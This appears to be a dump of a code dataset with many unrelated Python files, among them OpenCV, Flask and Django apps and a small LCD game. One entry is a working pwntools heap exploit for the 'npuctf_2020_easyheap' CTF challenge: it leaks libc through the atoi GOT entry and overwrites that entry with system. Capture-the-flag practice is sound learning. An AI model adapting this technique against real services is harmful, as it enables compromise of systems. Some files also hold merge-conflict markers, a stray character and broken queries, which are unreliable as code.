#see the doc of opencv to understand implementation details
convDefs = cv2.convexityDefects(cnt, hull_idx)
dist_order = np.argsort((-1)*convDefs[:,0,3])
max4dist = dist_order[0:4]
max4points = convDefs[max4dist,0,2]
for i in max4points:
cv2.circle(drawing, tuple(cnt[i,0]), 5, [255,255,0], 2)
hull_nbPts = hull.shape[0]
'''
#draws all the points constitue the convex hull (for debugging)
for i in range(hull_nbPts):
cv2.circle(drawing, tuple(hull[i,0]), 4, [255,0,0], 2)
cv2.putText(drawing, str(i), tuple(hull[i,0]), cv2.FONT_HERSHEY_SIMPLEX, 0.5, [255,0,0], 1, cv2.CV_AA)
'''
#find and draw center of contour
moments = cv2.moments(cnt)
if moments['m00']!=0:
cx = int(moments['m10']/moments['m00']) # cx = M10/M00
cy = int(moments['m01']/moments['m00']) # cy = M01/M00
centr=(cx,cy)
cv2.circle(drawing, centr, 5, [0, 255, 255], 2)
#find and draw point represents the wrist of the hand
wrist = find_wrist(centr, cnt, max4points)
cv2.circle(drawing, wrist, 5, [0, 255, 255], 2)
edge_thresh = 20
neighbor_thresh = 20
fixedPoint = wrist
idx_ok = simple_detect_fingerTips(hull, img, fixedPoint, edge_thresh, neighbor_thresh)
#print 'list of idx_ok = ', idx_ok
max_5hull_idx = idx_ok[0:1]
#print 'first five of idx_ok = ', max_5hull_idx
for i in max_5hull_idx:
cv2.circle(drawing, tuple(hull[i,0]), 6, [0,255,0], 2)
#print hull[i]
#print dist_from_center
cv2.imshow('contour and convex hull', drawing)
k = cv2.waitKey(0)
if __name__ == "__main__":
# main()
tracking()
|
4,863 | aeaab602cbb9fa73992eb5259e8603ecb11ba333 | import mlcd,pygame,time,random
PLAYER_CHAR=">"
OBSTACLE_CHAR="|"
screenbuff=[[" "," "," "," "," "," "," "," "," "," "," "," "],
[" "," "," "," "," "," "," "," "," "," "," "," "]]
player={"position":0,"line":0,"score":000}
game={"speed":4.05,"level":2.5,"obstacle":0}
keys={"space":False,"quit":False,"next":False}
def keypress(): #get keypresses
global keys
keys["space"]=keys["quit"]=keys["next"]=False #reset all keys
#check keys
for event in pygame.event.get():
if event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE:
keys["space"] = True
elif event.type == pygame.KEYUP and event.key == pygame.K_ESCAPE:
keys["quit"] = True
done=False
#initialize mlcd as 16x2 character lcd
mlcd.init(16,2)
lasttime=time.time()
curtime=0.0
while not done:
curtime=time.time()
if (curtime-lasttime>1/game["speed"]):
lasttime=curtime
#increment score and count obstacle
#up the level and increase the speed
if screenbuff[0][player["position"]]==OBSTACLE_CHAR or screenbuff[1][player["position"]]==OBSTACLE_CHAR:
player["score"]+=1
game["obstacle"]-=1
game["level"]+=0.5
game["speed"]+=0.05
#if((game["level"]+2)%game["posmovthres"]==0 and player["position"]<12 and screenbuff[player["line"]][player["position"]+1]!=OBSTACLE_CHAR and screenbuff[player["line"]][player["position"]+2]!=OBSTACLE_CHAR):
# player["position"]+=1
#move everything one place to the left
for lindex,lin in enumerate(screenbuff,start=0):
for index,pos in enumerate(lin, start=0):
if index>0:
screenbuff[lindex][index-1]=pos
#add new chars at end of buff , obstacles if there is a gap
screenbuff[0][-1]=" "
screenbuff[1][-1]=" "
if screenbuff[0][-2] != OBSTACLE_CHAR and screenbuff[1][-2]!=OBSTACLE_CHAR:
if game["obstacle"]<int(game["level"]) and random.choice([0,1]):
lin_temp=random.choice([0,1])
screenbuff[lin_temp][-1]=OBSTACLE_CHAR
game["obstacle"]+=1
elif screenbuff[0][-2] != OBSTACLE_CHAR:
if game["obstacle"]<int(game["level"]) and random.choice([0,1]):
lin_temp=random.choice([0,1])
if(lin_temp==1):
screenbuff[lin_temp][-1]=OBSTACLE_CHAR
game["obstacle"]+=1
elif screenbuff[1][-2] != OBSTACLE_CHAR:
if game["obstacle"]<int(game["level"]) and random.choice([0,1]):
lin_temp=random.choice([0,1])
if(lin_temp==0):
screenbuff[lin_temp][-1]=OBSTACLE_CHAR
game["obstacle"]+=1
#check for collision
if screenbuff[player["line"]][player["position"]]==OBSTACLE_CHAR:
done=True #player lost
#add player to the buffer
screenbuff[player["line"]][player["position"]]=PLAYER_CHAR
#ready the lines for drawing on lcd
lines=[''.join(screenbuff[0]) + "|scr",
''.join(screenbuff[1]) + "|"+str(player["score"])]
mlcd.draw(lines)
#remove player from buffer
screenbuff[player["line"]][player["position"]]=" "
#get keypresses
keypress()
#modify player line (move the player) if space is pressed
if keys["space"]:
if player["line"]==0:
player["line"]=1
else:
player["line"]=0
#quit
if keys["quit"]:
print("game quit")
done=True
pygame.quit()
|
4,864 | b80ccee42489aefb2858b8491008b252f6a2b9b7 | ii = [('CookGHP3.py', 2), ('MarrFDI.py', 1), ('GodwWSL2.py', 2), ('ChanWS.py', 6), ('SadlMLP.py', 1), ('WilbRLW.py', 1), ('AubePRP2.py', 1), ('MartHSI2.py', 1), ('WilbRLW5.py', 1), ('KnowJMM.py', 1), ('AubePRP.py', 2), ('ChalTPW2.py', 1), ('ClarGE2.py', 2), ('CarlTFR.py', 3), ('SeniNSP.py', 4), ('GrimSLE.py', 1), ('RoscTTI3.py', 1), ('CookGHP2.py', 1), ('CoolWHM.py', 1), ('DaltJMA.py', 1), ('NewmJLP.py', 1), ('GodwWLN.py', 3), ('MereHHB3.py', 1), ('MartHRW.py', 2), ('BentJRP.py', 23), ('ThomGLG.py', 1), ('StorJCC.py', 1), ('LewiMJW.py', 1), ('WilbRLW3.py', 1), ('FitzRNS2.py', 1), ('MartHSI.py', 1), ('EvarJSP.py', 5), ('DwigTHH.py', 4), ('TaylIF.py', 1), ('WordWYR.py', 1), ('WaylFEP.py', 1)] |
4,865 | b4992a5b396b6809813875443eb8dbb5b00eb6a9 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Import the otb applications package
import otbApplication
def ComputeHaralick(image, chan, xrad, yrad):
# The following line creates an instance of the HaralickTextureExtraction application
HaralickTextureExtraction = otbApplication.Registry.CreateApplication("HaralickTextureExtraction")
# The following lines set all the application parameters:
HaralickTextureExtraction.SetParameterString("in", image)
HaralickTextureExtraction.SetParameterInt("channel", int(chan))
HaralickTextureExtraction.SetParameterInt("parameters.xrad", int(xrad))
HaralickTextureExtraction.SetParameterInt("parameters.yrad", int(yrad))
HaralickTextureExtraction.SetParameterString("texture","simple")
HaralickTextureExtraction.SetParameterString("out", "HaralickTextures.tif")
# The following line execute the application
HaralickTextureExtraction.ExecuteAndWriteOutput()
print "HaralickTextures.tif a été écrit"
|
4,866 | 49c15f89225bb1dd1010510fe28dba34f6a8d085 | # -*- coding: utf-8 -*-
from sqlalchemy import or_
from ..extensions import db
from .models import User
def create_user(username):
user = User(username)
db.session.add(user)
return user
def get_user(user_id=None, **kwargs):
if user_id is not None:
return User.query.get(user_id)
username = kwargs.pop("username")
if username is not None:
return User.query.filter_by(username=username).first()
raise NotImplementedError
def get_user_like(query):
return User.query.filter(or_(User.username,like('%'+query+'%'))).limit(10).all()
|
4,867 | c31c59d172b2b23ca4676be0690603f33b56f557 | from django.contrib import admin
from django.urls import path
from . import views
urlpatterns = [
path('', views.skincare, name="skin"),
path('productSearch/', views.productSearch, name="productSearch"),
path('detail/', views.detail, name="detail"),
] |
4,868 | fbcbad9f64c0f9b68e29afde01f3a4fdba012e10 | """
Массив размером 2m + 1, где m — натуральное число, заполнен случайным образом. Найдите в массиве медиану.
Медианой называется элемент ряда, делящий его на две равные части:
в одной находятся элементы, которые не меньше медианы, в другой — не больше медианы.
Примечание: задачу можно решить без сортировки исходного массива.
Но если это слишком сложно, используйте метод сортировки, который не рассматривался на уроках
(сортировка слиянием также недопустима).
"""
"""В этой задаче как раз могла бы пригодиться быстрая сортировка Хоара или слиянием.
"Но без них не знаю, как можно написать более менее оптимизировано"""
import random
m = random.randint(5, 10)
# "одномерный вещественный массив, заданный случайными числами на промежутке [0; 50)" - т.е. [0; 49].
# Не знаю, важно ли это. uniform включает последнее число, в отличии от range и большинства прочих функций
# Для лучшей читабельности добавил округление
mas = [round(random.uniform(0, 49), 3) for i in range(2 * m + 1)]
print(f'Исходный список: {mas}')
# Через сортировку кучей
def heapify(array, size, ind):
largest = ind
left = (2 * ind) + 1
right = (2 * ind) + 2
if left < size and array[left] > array[largest]:
largest = left
if right < size and array[right] > array[largest]:
largest = right
if largest != ind:
array[ind], array[largest] = array[largest], array[ind]
heapify(array, size, largest)
def heap_sort(array):
n = len(array)
for i in range(n, -1, -1):
heapify(array, n, i)
for i in range(n - 1, 0, -1):
array[i], array[0] = array[0], array[i]
heapify(array, i, 0)
heap_sort(mas)
print(f'Отсортированный список по возрастанию: {mas}')
print(f'Медиана: {mas[len(mas) // 2]}')
# Читерский вариант :)
import statistics
print(statistics.median(mas))
|
4,869 | efe13de4ed5a3f42a9f2ece68fd329d8e3147ca2 | <<<<<<< HEAD
{'_data': [['Common', [['Skin', u'Ospecifika hud-reakti oner'], ['General', u'Tr\xf6tthet']]],
['Uncommon',
[['GI',
u'Buksm\xe4rta, diarr\xe9, f\xf6r-stoppnin g, illam\xe5ende (dessa symptom g\xe5r vanligt-vis \xf6ver vid fortsatt behandling).']]],
['Rare',
[['Blood', u'Hemolytisk anemi'],
['Immune system',
u'\xd6verk\xe4nslighets-reaktioner (urtikaria, angioneurotiskt \xf6dem, feber, dyspn\xe9, tr\xe5nghetsk\xe4nsla i svalget, bronkospasm, hypotension och br\xf6stsm\xe4rta). Dessa h\xe4ndelser har rapporterats efter singeldos. L\xe4kemedels-\xf6verk \xe4nslighet Hepatit'],
=======
{'_data': [['Common', [['Skin', u'Ospecifika hud-reaktioner'], ['General', u'Tr\xf6tthet']]],
['Uncommon',
[['GI',
u'Buksm\xe4rta, diarr\xe9, f\xf6r-stoppning, illam\xe5ende (dessa symptom g\xe5r vanligt-vis \xf6ver vid fortsatt behandling).']]],
['Rare',
[['Blood', u'Hemolytisk anemi'],
['Immune system',
u'\xd6verk\xe4nslighets-reaktioner (urtikaria, angioneurotiskt \xf6dem, feber, dyspn\xe9, tr\xe5nghetsk\xe4nsla i svalget, bronkospasm, hypotension och br\xf6stsm\xe4rta). Dessa h\xe4ndelser har rapporterats efter singeldos. L\xe4kemedels-\xf6verk\xe4nslighet Hepatit'],
>>>>>>> eb0dbf7cfbd3e1c8a568eedcf6ca5658233104cc
['Hepato',
u'Leversvikt, ibland med d\xf6dlig utg\xe5ng, \xf6verg\xe5ende och reversibla f\xf6r\xe4ndringar av leverfunktionstest.'],
['Skin', u'Hudutslag'],
['Renal',
u'F\xf6rh\xf6jt plasma-kreatinin (vanligtvis ringa; normaliseras under fortsatt behandling)'],
['Reproductive system', u'Erektil dysfunktion'],
['General', u'Feber']]],
['Very rare',
[['Blood',
u'F\xf6r\xe4ndringar i blodbilden (leukopeni, Trombo-cytopeni). Detta \xe4r normalt reversibelt. Agranulocytos eller pancytopeni ibland med benm\xe4rgs-hypoplasi eller aplasi.'],
['Immune system', u'Anafylaktisk chock (rapporterat efter singeldos).'],
['Psychiatric',
u'Mental f\xf6rvirring (reversibel), depression och hallucinationer, s\xe4rskilt hos \xe4ldre och sv\xe5rt sjuka.'],
['Nervous system',
u'Huvudv\xe4rk (ibland allvarlig), yrsel och reversibla tillst\xe5nd med ofrivilliga r\xf6relser'],
<<<<<<< HEAD
['Eye',
u'Dimsyn (reversibel), troligen orsakade av ackommodations-st \xf6rningar'],
['Cardiac', u'Som med andra H2-receptor-antago nister: bradykardi och AV-block'],
=======
['Eye', u'Dimsyn (reversibel), troligen orsakade av ackommodations-st\xf6rningar'],
['Cardiac', u'Som med andra H2-receptor-antagonister: bradykardi och AV-block'],
>>>>>>> eb0dbf7cfbd3e1c8a568eedcf6ca5658233104cc
['Vascular', u'Vaskulit'],
['GI', u'Akut pankreatit'],
['Hepato',
u'Hepatit (hepatocellul\xe4r, kanalikul\xe4r eller blandad art) med eller utan gulsot, Detta \xe4r vanligtvis reversibelt.'],
['Skin', u'Erythema multiforme, alopeci'],
['Musculoskeletal', u'Artralgi, myalgi'],
['Renal', u'Akut interstitiell nefrit'],
['Reproductive system',
u'Reversibel impotens, br\xf6stsymptom och andra tillst\xe5nd (s\xe5som gynekomasti och galaktorr\xe9)']]]],
'_note': u' ?MSFU',
'_pages': [4, 6],
u'_rank': 23,
u'_type': u'MSFU'} |
4,870 | eeedf4930a7fa58fd406a569db6281476c2e3e35 | #+++++++++++++++++++exp.py++++++++++++++++++++
#!/usr/bin/python
# -*- coding:utf-8 -*-
#Author: Squarer
#Time: 2020.11.15 20.20.51
#+++++++++++++++++++exp.py++++++++++++++++++++
from pwn import*
#context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('./npuctf_2020_easyheap')
libc = ELF('./libc-2.27.so')
#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
def add(size,cont):
sh.sendlineafter('Your choice :','1')
sh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ',str(size))
sh.sendlineafter('Content:',str(cont))
def edit(index,cont):
sh.sendlineafter('Your choice :','2')
sh.sendlineafter('Index :',str(index))
sh.sendafter('Content: ',str(cont))
def delete(index):
sh.sendlineafter('Your choice :','4')
sh.sendlineafter('Index :',str(index))
def show(index):
sh.sendlineafter('Your choice :','3')
sh.sendlineafter('Index :',str(index))
def show_addr(name,addr):
log.success('The '+str(name)+' Addr:' + str(hex(addr)))
sh = process('./npuctf_2020_easyheap')
sh = remote('node3.buuoj.cn',27634)
#extending
add(0x18,'A'*8)
add(0x18,'B'*8)
edit(0,'A'*0x18+'\x41')
delete(1)
#leaking
add(0x38,'A'*8) #1
payload = 'A'*0x10 + p64(0) + p64(0x21)
payload += p64(0x38) + p64(elf.got['atoi'])
edit(1,payload)
show(1)
sh.recvuntil('Content : ')
libc_addr = u64(sh.recv(6).ljust(8,'\x00')) - libc.sym['atoi']
system_addr = libc_addr + libc.sym['system']
show_addr('libc_addr',libc_addr)
show_addr('system_addr',system_addr)
#hijacking
edit(1,p64(system_addr))
#gdb.attach(sh,'b*0x400E6D')
sh.interactive()
|
4,871 | ebbc6f9115e6b4ca7d1050a59cf175d123b6f3aa | from flask import Flask
from threading import Timer
from crypto_crawler.const import BITCOIN_CRAWLING_PERIOD_SEC, COIN_MARKET_CAP_URL
from crypto_crawler.crawler import get_web_content, filter_invalid_records
app = Flask(__name__)
crawl_enabled = True
def crawl_bitcoin_price():
print("start crawling!")
bitcoin_prices = get_web_content(COIN_MARKET_CAP_URL)
bitcoin_prices = filter_invalid_records(bitcoin_prices)
# write_many(INSERT_CRYPTO_MANY, list(map(lambda x: x.to_tuple(), bitcoin_prices)))
# alarm_arbitrage(bitcoin_prices)
# alarm_prediction()
if crawl_enabled:
Timer(BITCOIN_CRAWLING_PERIOD_SEC, crawl_bitcoin_price).start()
else:
print("crawl paused!")
return
# actual crawl
@app.route("/pause")
def pause():
global crawl_enabled
crawl_enabled = False
return "PAUSED!"
@app.route("/status")
def status():
return "100%"
@app.route("/")
def default():
return "SAMPLE TRADING SYSTEM"
if __name__ == "__main__":
crawl_bitcoin_price()
app.run()
|
4,872 | 8c7dcff80eeb8d7d425cfb25da8a30fc15daf5f9 | import tcod as libtcod
import color
from input_handlers import consts
from input_handlers.ask_user_event_handler import AskUserEventHandler
class SelectIndexHandler(AskUserEventHandler):
"""
Handles asking the user for an index on the map.
"""
def __init__(self, engine):
super().__init__(engine)
player = self.engine.player
engine.mouse_location = (player.x, player.y)
def on_render(self, console):
"""
Highlight the tile under the cursor.
"""
super().on_render(console)
x, y = self.engine.mouse_location
console.tiles_rgb['bg'][x, y] = color.white
console.tiles_rgb['fg'][x, y] = color.black
def ev_keydown(self, event):
key = event.sym
if key in consts.MOVE_KEYS:
modifier = 1 # Holding modifier keys will speed up key movement
if event.mod & (libtcod.event.KMOD_LSHIFT | libtcod.event.KMOD_RSHIFT):
modifier *= 5
if event.mod & (libtcod.event.KMOD_LCTRL | libtcod.event.KMOD_RCTRL):
modifier *= 10
if event.mod & (libtcod.event.KMOD_LALT | libtcod.event.KMOD_RALT):
modifier *= 20
x, y = self.engine.mouse_location
dx, dy = consts.MOVE_KEYS[key]
x += dx * modifier
y += dy * modifier
# Restrict the cursor inddex to the map size.
x = max(0, min(x, self.engine.game_map.width - 1))
y = max(0, min(y, self.engine.game_map.height - 1))
self.engine.mouse_location = (x, y)
return None
elif key in consts.CONFIRM_KEYS:
return self.on_index_selected(*self.engine.mouse_location)
return super().ev_keydown(event)
def ev_mousebuttondown(self, event):
"""
Left click confirms a selection
"""
if self.engine.game_map.in_bounds(*event.tile):
if event.button == 1:
return self.on_index_selected(*event.tile)
return super().ev_mousebuttondown(event)
def on_index_selected(self, x, y):
raise NotImplementedError()
|
4,873 | 0b1e6a95ee008c594fdcff4e216708c003c065c8 | # -*- coding: utf-8 -*-
import logging
from django.shortcuts import render, redirect, HttpResponse
from django.core.urlresolvers import reverse
from django.conf import settings
from django.contrib.auth import logout, login, authenticate
from django.contrib.auth.hashers import make_password
from django.core.paginator import Paginator, InvalidPage, EmptyPage, PageNotAnInteger
from django.db import connection
from django.db.models import Count
from models import *
from forms import *
import json
logger = logging.getLogger('blog.views')
# Create your views here.
def global_setting(request):
# 站点基本信息
SITE_URL = settings.SITE_URL
SITE_NAME = settings.SITE_NAME
SITE_DESC = settings.SITE_DESC
# 分类信息获取(导航数据)
category_list = Category.objects.all()[:6]
# 文章归档数据
archive_list = Article.objects.distinct_date()
行
comment_count_list = Comment.objects.values('article').annotate(comment_count=Count('article')).order_by('-comment_count')
article_comment_list = [Article.objects.get(pk=comment['article']) for comment in comment_count_list]
return locals()
def index(request):
try:
# 最新文章数据
article_list = Article.objects.all()
article_list = getPage(request, article_list)
# 文章归档
# 1、先要去获取到文章中有的 年份-月份 2015/06文章归档
# 使用values和distinct去掉重复数据(不可行)
# print Article.objects.values('date_publish').distinct()
# 直接执行原生sql呢?
# 第一种方式(不可行)
# archive_list =Article.objects.raw('SELECT id, DATE_FORMAT(date_publish, "%%Y-%%m") as col_date FROM blog_article ORDER BY date_publish')
# for archive in archive_list:
# print archive
# 第二种方式(不推荐)
# cursor = connection.cursor()
# cursor.execute("SELECT DISTINCT DATE_FORMAT(date_publish, '%Y-%m') as col_date FROM blog_article ORDER BY date_publish")
# row = cursor.fetchall()
# print row
except Exception as e:
print e
logger.error(e)
return render(request, 'index.html', locals())
def archive(request):
try:
# 先获取客户端提交的信息
year = request.GET.get('year', None)
month = request.GET.get('month', None)
article_list = Article.objects.filter(date_publish__icontains=year+'-'+month)
article_list = getPage(request, article_list)
except Exception as e:
logger.error(e)
return render(request, 'archive.html', locals())
# 按标签查询对应的文章列表
def tag(request):
try:
pass
except Exception as e:
logger.error(e)
return render(request, 'archive.html', locals())
# 分页代码
def getPage(request, article_list):
paginator = Paginator(article_list, 2)
try:
page = int(request.GET.get('page', 1))
article_list = paginator.page(page)
except (EmptyPage, InvalidPage, PageNotAnInteger):
article_list = paginator.page(1)
return article_list
# 文章详情
def article(request):
try:
# 获取文章id
id = request.GET.get('id', None)
try:
# 获取文章信息
article = Article.objects.get(pk=id)
except Article.DoesNotExist:
return render(request, 'failure.html', {'reason': '没有找到对应的文章'})
# 评论表单
comment_form = CommentForm({'author': request.user.username,
'email': request.user.email,
'url': request.user.url,
'article': id} if request.user.is_authenticated() else{'article': id})
# 获取评论信息
comments = Comment.objects.filter(article=article).order_by('id')
comment_list = []
for comment in comments:
for item in comment_list:
if not hasattr(item, 'children_comment'):
setattr(item, 'children_comment', [])
if comment.pid == item:
item.children_comment.append(comment)
break
if comment.pid is None:
comment_list.append(comment)
except Exception as e:
print e
logger.error(e)
return render(request, 'article.html', locals())
# 提交评论
def comment_post(request):
try:
comment_form = CommentForm(request.POST)
if comment_form.is_valid():
#获取表单信息
comment = Comment.objects.create(username=comment_form.cleaned_data["author"],
email=comment_form.cleaned_data["email"],
url=comment_form.cleaned_data["url"],
content=comment_form.cleaned_data["comment"],
article_id=comment_form.cleaned_data["article"],
user=request.user if request.user.is_authenticated() else None)
comment.save()
else:
return render(request, 'failure.html', {'reason': comment_form.errors})
except Exception as e:
logger.error(e)
return redirect(request.META['HTTP_REFERER'])
# 注销
def do_logout(request):
try:
logout(request)
except Exception as e:
print e
logger.error(e)
return redirect(request.META['HTTP_REFERER'])
# 注册
def do_reg(request):
try:
if request.method == 'POST':
reg_form = RegForm(request.POST)
if reg_form.is_valid():
# 注册
user = User.objects.create(username=reg_form.cleaned_data["username"],
email=reg_form.cleaned_data["email"],
url=reg_form.cleaned_data["url"],
password=make_password(reg_form.cleaned_data["password"]),)
user.save()
# 登录
user.backend = 'django.contrib.auth.backends.ModelBackend' # 指定默认的登录验证方式
login(request, user)
return redirect(request.POST.get('source_url'))
else:
return render(request, 'failure.html', {'reason': reg_form.errors})
else:
reg_form = RegForm()
except Exception as e:
logger.error(e)
return render(request, 'reg.html', locals())
# 登录
def do_login(request):
try:
if request.method == 'POST':
login_form = LoginForm(request.POST)
if login_form.is_valid():
# 登录
username = login_form.cleaned_data["username"]
password = login_form.cleaned_data["password"]
user = authenticate(username=username, password=password)
if user is not None:
user.backend = 'django.contrib.auth.backends.ModelBackend' # 指定默认的登录验证方式
login(request, user)
else:
return render(request, 'failure.html', {'reason': '登录验证失败'})
return redirect(request.POST.get('source_url'))
else:
return render(request, 'failure.html', {'reason': login_form.errors})
else:
login_form = LoginForm()
except Exception as e:
logger.error(e)
return render(request, 'login.html', locals())
def category(request):
try:
# 先获取客户端提交的信息
cid = request.GET.get('cid', None)
try:
category = Category.objects.get(pk=cid)
except Category.DoesNotExist:
return render(request, 'failure.html', {'reason': '分类不存在'})
article_list = Article.objects.filter(category=category)
article_list = getPage(request, article_list)
except Exception as e:
logger.error(e)
return render(request, 'category.html', locals())
|
4,874 | ae4f8eb71939ff212d05d12f65edeaecf66f2205 | from launch import LaunchDescription
from launch_ros.actions import Node
import os
params = os.path.join(
'INSERT_PATH/src/beckhoff_ros',
'config',
'params.yaml'
)
def generate_launch_description():
return LaunchDescription([
Node(
package='beckhoff_ros',
executable='beckhoff_ros_node',
name='beckhoff_ros_node',
parameters=[params],
output='screen'
)
]) |
4,875 | f1972baee8b399c9a52561c8f015f71cb9922bb0 | version https://git-lfs.github.com/spec/v1
oid sha256:7f0b7267333e6a4a73d3df0ee7f384f7b3cb6ffb14ed2dc8a5894b853bac8957
size 1323
|
4,876 | b84a2093a51e57c448ee7b4f5a89d69dfb14b1b6 | import os
import sys
from flask import Flask, request, abort, flash, jsonify, Response
from flask_sqlalchemy import SQLAlchemy
from flask_cors import CORS
from flask_migrate import Migrate
import random
import unittest
from models import db, Question, Category
# set the number of pages fpr pagination
QUESTIONS_PER_PAGE = 10
# create and configure the app
app = Flask(__name__)
app.config.from_object('config')
db.init_app(app)
migrate = Migrate(app, db)
# set up cors for the application
cors = CORS(app, resources={r'/': {'origins': '*'}})
# to set Access-Control-Allow Headers and Methods
@app.after_request
def after_request(response):
response.headers.add('Access-Control-Allow-Headers',
'Content-Type, Authorization, true')
response.headers.add('Access-Control-Allow-Methods',
'GET, PATCH,PUT,POST, DELETE, OPTIONS')
return response
# endpoint to handle GET requests for all available categories
@app.route('/categories', methods=['GET'])
def get_categories():
categories = [category.type for category in Category.query.all()]
return jsonify({'categories': categories, 'success': True})
# endpoint to handle GET requests for questions with pagination
@app.route('/questions/page/<int:page>', methods=['GET'])
def get_questions(page):
error = False
questions = []
total_questions = 0
# if question id is not an integer
if type(page) is not int:
# let them know their input is not processable
abort(422)
# ensure proper request method
if request.method == 'GET':
try:
# query for all categories
categories = [category.type for category in Category.query.all()]
if categories is None:
# let the user know that no resource was found
abort(404)
query = Question.query.paginate(page, per_page=10)
total_questions += len(Question.query.all())
if query is None:
# let the user know that no resource was found
abort(404)
if len(query.items) == 0:
# let the user know that no resource was found
error = True
results = query.items
# format data
for question in results:
_question_ = {
'id': question.id,
'question': question.question,
'answer': question.answer,
'category': question.category,
'difficulty': question.difficulty
}
questions.append(_question_)
except Exception:
# set error to true and log on the server
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
if error:
# let the user know their request was not successful
abort(400)
else:
# if successful send back success response
return jsonify({
'success': True,
'questions': questions,
'total_questions': total_questions,
'categories': categories
})
else:
# send method not allowed error
abort(405)
# endpoint to delete a question from the database
@app.route('/question/<int:question_id>', methods=['DELETE'])
def delete_question(question_id):
error = False
# ensure proper request method
if request.method == 'DELETE':
# if question id is not an integer
if type(question_id) is not int:
# let them know their input is not processable
abort(422)
try:
# get user selected question from database
question = Question.query.get(question_id)
# stage question delete
db.session.delete(question)
# commit deletion to the database
db.session.commit()
except Exception:
# set error to true and log on the server
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
# close database session
db.session.close()
if error:
# send bad request error
abort(400)
else:
# if no error send success object and log on server
return jsonify({
'success': True,
'method': 'Delete',
'question': question_id
})
else:
# send method not allowed error
abort(405)
# endpoint to add a question to the database
@app.route('/questions', methods=['POST'])
def add_question():
error = False
# ensure proper request method
if request.method == 'POST':
try:
# format data for database
new_question = Question(
question=request.json['question'],
answer=request.json['answer'],
category=request.json['category'],
difficulty=request.json['difficulty']
)
# stage data in database
db.session.add(new_question)
# commit data to database
db.session.commit()
except Exception:
# set error to true and log on the server
error = True
db.session.rollback()
print('Error: {}'.format(sys.exc_info()))
finally:
# close database session
db.session.close()
if error:
# send bad request error
abort(400)
else:
# if no error send success object and log on server
print('Added: {}'.format(new_question))
return jsonify({
'success': True,
'question': request.json
})
else:
# send method not allowed error
abort(405)
# endpoint to search for for questions in the database
@app.route('/questions/search', methods=['POST'])
def search_questions():
error = False
# ensure proper request method
if request.method == 'POST':
# set esrch term from user request
search_term = str(request.json['searchTerm'])
# if the user submits something other than a string of text block it
if type(search_term) is not str:
# let them know their input is not processable
abort(422)
try:
# query database using user provided search term
query_results = Question.query.filter(
Question.question.ilike('%{}%'.format(search_term))).all()
questions = []
# get categories from database
categories = [category.type for category in Category.query.all()]
# format response data
for question in query_results:
_question_ = {
'id': question.id,
'question': question.question,
'answer': question.answer,
'category': question.category,
'difficulty': question.difficulty
}
questions.append(_question_)
except Exception:
# set error to true and log on the server
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
if error:
# send bad request error
abort(400)
else:
# if no error send success object
return jsonify({
'success': True,
'questions': questions,
'total_questions': len(questions),
'current_category': ''
})
else:
# send method not allowed error
abort(405)
# endpoint to get questions by a specific category
@app.route('/category/<int:category_id>/questions', methods=['GET'])
def get_questions_by_category(category_id):
error = False
# ensure proper request method
if request.method == 'GET':
# if category id is not an integer
if type(category_id) is not int:
# let them know their input is not processable
abort(422)
try:
# get questions by user selected category
query = Question.query.filter_by(category=str(category_id)).all()
questions = []
# format response data
for question in query:
_question_ = {
'id': question.id,
'question': question.question,
'answer': question.answer,
'category': question.category,
'difficulty': question.difficulty
}
questions.append(_question_)
except Exception:
# set error to true and log on the server
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
if error:
# send bad request error
abort(400)
else:
# if no error send success object
return jsonify({
'success': True,
'questions': questions,
'total_questions': len(questions),
'current_category': ''
})
else:
# send method not allowed error
abort(405)
# endpoint to initiate quiz
@app.route('/questions/quiz', methods=['POST'])
def quizzes():
error = False
# ensure proper request method
if request.method == 'POST':
try:
data = request.json
# get questions from any category
if data['quiz_category']['id'] == 0:
query = Question.query.all()
# get questions from user specified caetgory
else:
query = Question.query.filter_by(
category=str(int(data['quiz_category']['id'])+1)).all()
# randomly select new non previously selected question
previous_questions = data['previous_questions']
index = random.randint(0, len(query)-1)
potential_question = query[index]
selected = False
while selected is False:
if potential_question.id in previous_questions:
# reassign index if already used
index = random.randint(0, len(query)-1)
potential_question = query[index]
else:
selected = True
# set question
_question_ = potential_question
# format data
next_question = {
'id': _question_.id,
'question': _question_.question,
'answer': _question_.answer,
'category': _question_.category,
'difficulty': _question_.difficulty
}
except Exception:
# set error and log error on the server
error = True
print('Error: {}'.format(sys.exc_info()))
finally:
if error:
# send internal server error
abort(500)
else:
# if no error send success object
return jsonify({
'success': True,
'question': next_question
})
else:
# send method not allowed error
abort(405)
# handle bad request errors
@app.errorhandler(400)
def bad_request(error):
return jsonify({
"success": False,
"error": 400,
"message": "Bad Request"
}), 400
# handle resource not found errors
@app.errorhandler(404)
def resource_not_found(error):
return jsonify({
"success": False,
"error": 404,
"message": "Resource Not Found"
}), 404
# handle resource not found errors
@app.errorhandler(405)
def method_not_allowed(error):
return jsonify({
"success": False,
"error": 405,
"message": "Method Not Allowed"
}), 405
# handle unprocessable entity errors
@app.errorhandler(422)
def unprocessable_entity(error):
return jsonify({
"success": False,
"error": 422,
"message": "Unprocessable Entity"
}), 422
# handle internal server errors
@app.errorhandler(500)
def internal_server_error(error):
return jsonify({
"success": False,
"error": 500,
"message": "Internal Server Error"
}), 500
# Default port:
if __name__ == '__main__':
app.run()
|
4,877 | d583661accce8c058f3e6b8568a09b4be1e58e4e |
from django.core.urlresolvers import reverse
from django.contrib.auth.decorators import login_required
from django.http import HttpResponse, HttpResponseRedirect, HttpResponseForbidden, HttpResponseServerError
from django.shortcuts import render
from django.template import RequestContext
import json
import datetime
import os
import re
from cog.views.utils import getQueryDict
from cog.plugins.esgf.security import esgfDatabaseManager
import traceback
import json
# Code used for react components
# Get directories for static files
package_dir = os.path.dirname(os.path.abspath(__file__))
static_dir = os.path.dirname(package_dir)
js_dir = os.path.join(static_dir,"static/cog/cog-react/js/")
css_dir = os.path.join(static_dir,"static/cog/cog-react/css/")
# Get static list
js_files = os.listdir(js_dir)
css_files = os.listdir(css_dir)
js_files = list(map(lambda f: "cog/cog-react/js/" + f, js_files))
css_files = list(map(lambda f: "cog/cog-react/css/" + f, css_files))
# Separate source and map files
map_files = []
